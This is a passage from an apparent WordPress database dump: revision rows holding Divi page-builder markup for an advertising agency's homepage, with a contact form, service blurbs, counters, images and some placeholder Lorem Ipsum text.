button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:47:21','2020-07-06 20:47:21','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(250,1,'2020-07-06 20:49:14','2020-07-06 20:49:14','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button 